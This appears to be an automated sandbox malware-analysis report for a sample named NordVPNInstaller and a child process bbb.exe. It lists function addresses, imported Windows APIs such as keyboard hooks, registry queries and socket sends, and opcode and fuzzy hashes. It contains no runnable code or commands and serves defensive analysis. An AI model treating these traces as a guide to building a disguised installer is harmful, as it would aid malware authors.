Instruction Fuzzy Hash: 4401DE765006009FDB608F05E884B6AFBE5EF09324F08C4AEDD464A651D371E419CFA2

Function 05DE0542 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 05DE0580

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: b0504cf98ec08cbe6c09ca8772ec36804837d61605df478626a5b4b0e864bb9b
Instruction ID: 6f5616428a810d4bdf518ce47c8825524aa81ba196a61f624049c036e5fa419e
Opcode Fuzzy Hash: b0504cf98ec08cbe6c09ca8772ec36804837d61605df478626a5b4b0e864bb9b
Instruction Fuzzy Hash: 58018C75900200DFDB20DF55D888B66FBE4EF58320F08889AED898A612C375E419CFA2

Function 05DE037E Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

RasEnumConnectionsW.RASAPI32(?,00000E24,?,?), ref: 05DE03CE

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: b6da7b24889e13504fb49e23d42ee72cb1af4e9d342169ba8f4cac57268c03c5
Instruction ID: 332f4e42c5f9e5354b46e39262d01918abbe5375c21f59db0953f27dc5cd2545
Opcode Fuzzy Hash: b6da7b24889e13504fb49e23d42ee72cb1af4e9d342169ba8f4cac57268c03c5
Instruction Fuzzy Hash: 0D014F71500600ABD210DF16DD46B66FBE8FB88B20F14815AED089BB41D771F955CBE5

Function 05DE4F22 Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000E24,?,?), ref: 05DE4F72

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: b4df22348e28fc00c9a15b7ebebeb56fe3d399cff5f63b135f54f313e2219c93
Instruction ID: e39512f43b67bd5d63a8b9a9b901c04eb25f2a0e3836bd01013a9df51554225b
Opcode Fuzzy Hash: b4df22348e28fc00c9a15b7ebebeb56fe3d399cff5f63b135f54f313e2219c93
Instruction Fuzzy Hash: A5018F71500200ABD210DF16CD46B66FBE8FB88B20F14811AEC089BB41D731F959CBE5

Function 05DE02AA Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,?,?), ref: 05DE02FA

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: efdf6149e284e8dd55626c4dd8f087f72017e791e59b30d5b909b121c36929d9
Instruction ID: 62d3c4a77637ceb20b4730cffddfb89b7750a49908bebf771d797ef0807aa8ec
Opcode Fuzzy Hash: efdf6149e284e8dd55626c4dd8f087f72017e791e59b30d5b909b121c36929d9
Instruction Fuzzy Hash: AF018F71500200ABD210DF16CD46B66FBE8FB88B20F14811AEC089BB41D771F955CBE5

Function 0104A772 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000E24,?,?), ref: 0104A7BD

Memory Dump Source

Source File: 00000000.00000002.2765090150.000000000104A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_104a000_NordVPNInstaller.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: c5bb405326155fe461882ce42d9ef39281e1057f37954edf38dcf906f8db9bfa
Instruction ID: aa9cad428a423eacbf6a98ce5bda2a53115f18d35c2b7f8acb9c567c56bc35c3
Opcode Fuzzy Hash: c5bb405326155fe461882ce42d9ef39281e1057f37954edf38dcf906f8db9bfa
Instruction Fuzzy Hash: A4018F71500200ABD210DF16CD46B66FBE8FB88B20F14811AEC089BB41D731F959CBE5

Function 05DE6A7A Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 05DE6AB5

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 8c52237f338987a1aa6c71afb3857d31e8b1a18ae33f28c230dba38fec6598bf
Instruction ID: 73527afe360bdf405b1c563cec8406deca7026e9614694a1874ef3af28e5d529
Opcode Fuzzy Hash: 8c52237f338987a1aa6c71afb3857d31e8b1a18ae33f28c230dba38fec6598bf
Instruction Fuzzy Hash: 3A01B1759006408FDB20CF15D885B66FBE4EF24320F18C09EDD454B651C371E458CBA1

Function 0104A09A Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,?), ref: 0104A0D5

Memory Dump Source

Source File: 00000000.00000002.2765090150.000000000104A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_104a000_NordVPNInstaller.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 3b84ddca979dff53b755fadfe78f375577fe4f4bb9b145aa6605a908949c16ca
Instruction ID: 352ca19a3201b10acb439350a972caaa59b6d5f2d02b1a5ee79a7f24a710e693
Opcode Fuzzy Hash: 3b84ddca979dff53b755fadfe78f375577fe4f4bb9b145aa6605a908949c16ca
Instruction Fuzzy Hash: 1001B1B5604240DFDB60CF55D884B65FBE4EF54320F08C4AAED8A8BA52D375E448CBA2

Function 0104A8E6 Relevance: 1.5, APIs: 1, Instructions: 39comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 0104A918

Memory Dump Source

Source File: 00000000.00000002.2765090150.000000000104A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_104a000_NordVPNInstaller.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 933006cbc8b64cf49112cd2bc6b96713c0e615826a72d3a16360137e1e01d70d
Instruction ID: b250311ead4dfbd8449458b298d1c17c88970a0eb4bdfdfc085d24e7a71354e9
Opcode Fuzzy Hash: 933006cbc8b64cf49112cd2bc6b96713c0e615826a72d3a16360137e1e01d70d
Instruction Fuzzy Hash: E101A2B9A04240CFDB50CF15D884765FBE4EF45320F08C4AADD898F746D279E904CBA1

Function 05DE5AEA Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 05DE5B25

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 56fc96726a05d7b7ef87db039d71d6f84d1387d12ff78db576b734961c1f0c85
Instruction ID: 2be0e64dd71eb5ff5bceca63193b74dc843fb397f2703723c1a63cdf379afc6f
Opcode Fuzzy Hash: 56fc96726a05d7b7ef87db039d71d6f84d1387d12ff78db576b734961c1f0c85
Instruction Fuzzy Hash: 18018B755002409FDB60DF05E884B65FBE1FF59325F08C09ADE8A0B662D375E418CBA2

Function 05DE4426 Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 05DE4461

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ddfe9344d14b2c4e021175f7533ac2f2836eb7f01a9715c1a5b618cf2037af39
Instruction ID: 2df7c9c92d6fb34169e73f69d61e477bcdccf28f556b1740dc47b7884ad07d7a
Opcode Fuzzy Hash: ddfe9344d14b2c4e021175f7533ac2f2836eb7f01a9715c1a5b618cf2037af39
Instruction Fuzzy Hash: F8018B75A00240DFDF60DF05D884B65FBE4FF58324F08C09AED890A662E3B5E418CBA2

Function 05DE5756 Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 05DE5788

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: c3ad4de203231afac77eb8d287adad2150b4333db420dab9a6f8a0dfc56088f5
Instruction ID: 632ea9d504b7e335377a0f86c4f3abccc67c388a5d879efba3e8d90b0c53fd25
Opcode Fuzzy Hash: c3ad4de203231afac77eb8d287adad2150b4333db420dab9a6f8a0dfc56088f5
Instruction Fuzzy Hash: 0CF0DC78900200CFDB10EF05E884B65FBA4EF45229F08C09ACD490B752D275E818CAA2

Function 0104A2DA Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,619391D9,00000000,?,?,?,?,?,?,?,?,6C9F3C58), ref: 0104A30C

Memory Dump Source

Source File: 00000000.00000002.2765090150.000000000104A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_104a000_NordVPNInstaller.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 077294eb1a510aa96a95535b499abf8465b7270c05ba88cbd8f5516316e74268
Instruction ID: 64db0499482b9d5d6682836d734d3e56a32d46208a110b37465798abbdc0bcc5
Opcode Fuzzy Hash: 077294eb1a510aa96a95535b499abf8465b7270c05ba88cbd8f5516316e74268
Instruction Fuzzy Hash: 32F0AFB5A04240CFDB608F06D884765FBE4EF55721F08C0EAED4A4B756E3B5E408CBA2

Function 013E009B Relevance: .5, Instructions: 543COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2765778662.00000000013E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13e0000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba9c484f2bf2a9633e3bebbfe1a89375d977fc500e1618e91a91958ac94dd902
Instruction ID: f8dc2326786e16dd58892425432ebf162023674af686392e9c3816d2bda81efe
Opcode Fuzzy Hash: ba9c484f2bf2a9633e3bebbfe1a89375d977fc500e1618e91a91958ac94dd902
Instruction Fuzzy Hash: 3A51AD6244E3C18FD7538B748C69A91BFB4AF53224F0E84EBD485CB5A3D26C5C49CB62

Function 013E02B1 Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2765778662.00000000013E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13e0000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c390fe1156821e50a05374258ba03d70a54d62e49a6f416675d3084319f61b6
Instruction ID: bbb126b0f2b4819881b4b1a213282aec9e59d4a58333b751706efddcf70371fc
Opcode Fuzzy Hash: 4c390fe1156821e50a05374258ba03d70a54d62e49a6f416675d3084319f61b6
Instruction Fuzzy Hash: E621B77250D3C09FD7128B15CC54B62BFF4EB43624F0984EBE8468B693D26D9804CB61

Function 05DB2AA2 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2779515341.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fef36475128400cb73b46a8fe21f24c896bce03cf12d278bfe3191f194685e5
Instruction ID: 4f75e854590b1bc8eda468fb1897a9e448e15dfc4716c69c6de2128287bdb809
Opcode Fuzzy Hash: 7fef36475128400cb73b46a8fe21f24c896bce03cf12d278bfe3191f194685e5
Instruction Fuzzy Hash: 2F21E7B5608341AFD340CF19D840A5BBBE4EB89660F04896EF99897311D230E9088BA2

Function 05DB3514 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2779515341.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ca3b96d7752b7c9a038485dbc67c9101a44f7827977fa6177a6052be1cd4a3a
Instruction ID: 81c23238d90023e3246953f40949357e608de0303a92a58bb4e0997d1666538d
Opcode Fuzzy Hash: 3ca3b96d7752b7c9a038485dbc67c9101a44f7827977fa6177a6052be1cd4a3a
Instruction Fuzzy Hash: EE11B8B5908341AFD740CF19D880A5BFBE4FBD8664F04895EF99897311D231E9048FA2

Function 013E12BB Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2765778662.00000000013E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13e0000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd04be9e9b2f9bd25d564c0dffbf454e9a433330ddf49c50f4931565c45c1bff
Instruction ID: 6005c17a378ae7e07827296220d4d16f5131a0bbcbf5e80019835ab47efe7d22
Opcode Fuzzy Hash: fd04be9e9b2f9bd25d564c0dffbf454e9a433330ddf49c50f4931565c45c1bff
Instruction Fuzzy Hash: 56216F7550D3C49FC702CB14C854B15BFF1AB8A708F1886EED4898B6A3C37A8806DB52

Function 013E12DC Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2765778662.00000000013E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13e0000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ae7a89bd9a4a3e0e6470a39cda92c1d38bbd2d68aa535f5017aa72f703c58a6
Instruction ID: b5c0075e6c9181203c186603e0cb630ec5ba9c7a6df78f3e7cf66867f1da2087
Opcode Fuzzy Hash: 1ae7a89bd9a4a3e0e6470a39cda92c1d38bbd2d68aa535f5017aa72f703c58a6
Instruction Fuzzy Hash: 2311B4742043849FD716CB14C944B26BBE5EB8971CF28C59CE5495BB92C777D803C641

Function 013E14A4 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2765778662.00000000013E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13e0000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29cbfe0784d2dd2e591d278e930bacd8d72c2c4c3e833bf16c473309992a5c0f
Instruction ID: 7470ae38452a874d5df4a85b96026d7fa56add16429a7a0b5b5eb4e97e0d7675
Opcode Fuzzy Hash: 29cbfe0784d2dd2e591d278e930bacd8d72c2c4c3e833bf16c473309992a5c0f
Instruction Fuzzy Hash: 0A11AF35204384DFD716CB14D588B26BBE5AB8971CF28C59CE90A0BBC2C73AD802CA81

Function 013E04CE Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2765778662.00000000013E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13e0000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51699bf740917ab76ac3f20b6c400bdfe3215f68efd075df5d6435dc9acb8ddf
Instruction ID: b5c49488214ba482fbaa44eac7c503c216687266acd454090133519ceb45c9c0
Opcode Fuzzy Hash: 51699bf740917ab76ac3f20b6c400bdfe3215f68efd075df5d6435dc9acb8ddf
Instruction Fuzzy Hash: 4D01F571608784CED711CB19D988765FBD8EB55628F08C46AEC0A4BB82C3B8E404CFA2

Function 013E05E0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2765778662.00000000013E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13e0000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f645b9ccdec728ed4efa2a262e7753d49836d9dbe8a0a2d7ee67a69d0b5a238e
Instruction ID: 44e5d85cf08789f447e01357536f217d7dea7bedcaa1a18e20d468eb862e432d
Opcode Fuzzy Hash: f645b9ccdec728ed4efa2a262e7753d49836d9dbe8a0a2d7ee67a69d0b5a238e
Instruction Fuzzy Hash: B601F9B65093806FD7118F16AC40863FFF8EB86230709C49FEC49CB652D265B809CBB2

Function 013E1492 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2765778662.00000000013E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13e0000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c199ac73fd354e2e28f7749d41ff5d6aa77c8454fca99ac5bc470adea2379e2b
Instruction ID: e12b494d29ab9ae7db4c37692e9f02fb356b46ea87ca0d1e02dc6501dcae4f8c
Opcode Fuzzy Hash: c199ac73fd354e2e28f7749d41ff5d6aa77c8454fca99ac5bc470adea2379e2b
Instruction Fuzzy Hash: 83113C34609380CFC716CB14C994B15BBB1EB46708F2886EED8494B6A3C37AD806CB52

Function 013E1398 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2765778662.00000000013E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13e0000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3c181a57d58872c77186dea16c7b84c2b348ca3ffffdec1f3d2b946b90fd649
Instruction ID: 3cb25e56b35a549190329deb068a1c719c2a24b335bcc7cd30208d48af3920f1
Opcode Fuzzy Hash: a3c181a57d58872c77186dea16c7b84c2b348ca3ffffdec1f3d2b946b90fd649
Instruction Fuzzy Hash: 2BF0FB35108644DFC706CF04D944B15FBE2EB89718F24CAA9E94917A52C3379812DA81

Function 013E155C Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2765778662.00000000013E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13e0000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5cfa385388cdede7e0e325605ac3fa6b3ddf835df4aae062ecb90a44bb4ef3a
Instruction ID: be1a43e6a024627a0fa10e1a226cb92d346cfad0270fc7f5b019315bf0982fef
Opcode Fuzzy Hash: d5cfa385388cdede7e0e325605ac3fa6b3ddf835df4aae062ecb90a44bb4ef3a
Instruction Fuzzy Hash: 7DF01D35104644DFC206CB04D584B15FBA2FB89718F24C6ADE94907B52C337D812CA81

Function 013E0606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2765778662.00000000013E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13e0000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7569ebcd1b6671edd071ec0eab0c4da80382ba6c1cee6321d160463bafe52801
Instruction ID: 3da0e099689586bd3a9629e16ae269c9f15611733f282c0aad847eb86a2ba9b9
Opcode Fuzzy Hash: 7569ebcd1b6671edd071ec0eab0c4da80382ba6c1cee6321d160463bafe52801
Instruction Fuzzy Hash: 7FE092B66006044BD650CF0BFC41462F7D8EBC8630708C07FDC0D8BB01D635B908CAA5

Function 05DB357F Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2779515341.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eeadb05cde85cddc96dc1a552b4c2c66c0ddfebc00277954b062880246ffaf4f
Instruction ID: 1a8d6af7ce7250da9dbd40800d087dd3c9c3c2d7e413e23e573ffdaf71742e64
Opcode Fuzzy Hash: eeadb05cde85cddc96dc1a552b4c2c66c0ddfebc00277954b062880246ffaf4f
Instruction Fuzzy Hash: 26E0D8F654020067D7508E069C45F62FB98DB94A30F04C46BED081B741D171B914CAF1

Function 05DB2B17 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2779515341.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be623b35ea72d1b5d2494efff1aee3894a67ab72365eec19d4a4e93750872e36
Instruction ID: 090893f60af966c8a34beaf072c8c5ffd5a86d5eeaf392d552e9d7f4dacc240d
Opcode Fuzzy Hash: be623b35ea72d1b5d2494efff1aee3894a67ab72365eec19d4a4e93750872e36
Instruction Fuzzy Hash: E7E0D8B660120067D7108F069C45F62FB98DB90A30F04C45BED081B742E171B9148AF1

Function 010423F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2765077299.0000000001042000.00000040.00000800.00020000.00000000.sdmp, Offset: 01042000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1042000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 249fd588810bee150194934024c2dd38ae8fe76ee2091e6cbd772fda667ee6c7
Instruction ID: 5cf10df918a98f3f627a699c61d0db10e57245ce9bf93b7255160ddbf8fe309d
Opcode Fuzzy Hash: 249fd588810bee150194934024c2dd38ae8fe76ee2091e6cbd772fda667ee6c7
Instruction Fuzzy Hash: B4D02B753006C04FE3128B0CD1A8B953BE4EB80704F0A00F9A840CB763CB28D4C0C100

Function 010423BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2765077299.0000000001042000.00000040.00000800.00020000.00000000.sdmp, Offset: 01042000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1042000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b0f88e415eb66f4198237fc77f2caa1d7c21dcf49c77461df4c030bd090c1f0
Instruction ID: 46c4cd8788bc855dbeebf45283677e833c7f55689ee8b358b2827044ad4ce176
Opcode Fuzzy Hash: 1b0f88e415eb66f4198237fc77f2caa1d7c21dcf49c77461df4c030bd090c1f0
Instruction Fuzzy Hash: A9D05E743006814BD715DA0CD2E4F593BE4AB40715F0A84F8BC508B762C7A8D8C4DA00

Non-executed Functions

Function 066951A8 Relevance: 6.4, Strings: 3, Instructions: 2652COMMON

Download Yara Rule

Strings

:@k, xrefs: 066966E3
d, xrefs: 06696018
d, xrefs: 06696032

Memory Dump Source

Source File: 00000000.00000002.2780316544.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID: :@k$d$d
API String ID: 0-1561012353
Opcode ID: 8574b4bfd361dbf21f2bfb46fea6057023220b39f4df81b30a986b9eb682ce16
Instruction ID: 974744d7de03ec86b3d997ee12b301aafebb4300afd9ca1279c806d35690dbe7
Opcode Fuzzy Hash: 8574b4bfd361dbf21f2bfb46fea6057023220b39f4df81b30a986b9eb682ce16
Instruction Fuzzy Hash: 07331871D006299FDF65CF68C844A99BBF2BF89304F0580EAD90CAB261D771AE85CF51

Function 065932C8 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2780126634.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6590000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f01959a63154dfd58faf76d6bb2bc4ed4f82d3fdb291ac78ddcbcc3afafae7e5
Instruction ID: 9968bb49766a6d3d5bc762d33ca0a14a2f767079ab04e6879b60b9d95131cb9e
Opcode Fuzzy Hash: f01959a63154dfd58faf76d6bb2bc4ed4f82d3fdb291ac78ddcbcc3afafae7e5
Instruction Fuzzy Hash: 6A91356244E3C09FD7438B708C6A6927FB4AF1322471E55DBD0C0CF4A3E66A594ACB72

Analysis Process: bbb.exePID: 1196, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	15.8%
Dynamic/Decrypted Code Coverage:	83.3%
Signature Coverage:	2.6%
Total number of Nodes:	156
Total number of Limit Nodes:	9

Executed Functions

Function 05022A21 Relevance: 20.7, APIs: 3, Strings: 4, Instructions: 8472COMMON

Download Yara Rule

Strings

:@k, xrefs: 0502B215
:@k, xrefs: 0502B28A
:@k, xrefs: 0502B533
:@k, xrefs: 0502B610

Memory Dump Source

Source File: 00000004.00000002.3131748345.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5020000_bbb.jbxd

Similarity

API ID:
String ID: :@k$:@k$:@k$:@k
API String ID: 0-2500404787
Opcode ID: 4b429a5873df5aeb1ee9b78d1b0cf639bbe5d46d6d22238ae72fe51d870fde0e
Instruction ID: 5a10c7f93f8f15b0b73a8d9999f09c707c3e79cc1c1e6fc754deefa0686bfdc6
Opcode Fuzzy Hash: 4b429a5873df5aeb1ee9b78d1b0cf639bbe5d46d6d22238ae72fe51d870fde0e
Instruction Fuzzy Hash: 6CF3C034B046248FDB68DF24D955BAEB3F2EF88204F1080A9D50A97794DF39AD86CF51

Function 05020F78 Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 919COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0502117C

Strings

:@k, xrefs: 05021B30

Memory Dump Source

Source File: 00000004.00000002.3131748345.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5020000_bbb.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID: :@k
API String ID: 6842923-2277858631
Opcode ID: 34fb6c2dd69767ec8d59f6e6a2b87057597428cd5cba3ba8ea9bfe8faa2f8f42
Instruction ID: 9e839705d4f971c394064421f9a5f58e8c7fcaadd172e27a2dce21e8c782d962
Opcode Fuzzy Hash: 34fb6c2dd69767ec8d59f6e6a2b87057597428cd5cba3ba8ea9bfe8faa2f8f42
Instruction Fuzzy Hash: 47625230B042508BCB18AB78E9157AE77E3AFC5308F158469D9069BBD2DF35DD0AC792

Function 05020F69 Relevance: 2.2, APIs: 1, Instructions: 714COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3131748345.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5020000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d862ab6a40d067ad0ecef60c2c6ab2f482e41a964c4997b021d9ef1a287356ad
Instruction ID: 3ae05b13f3aad34647f7288ccadfaa2f22810193abf4a017a4c1eb199bed5083
Opcode Fuzzy Hash: d862ab6a40d067ad0ecef60c2c6ab2f482e41a964c4997b021d9ef1a287356ad
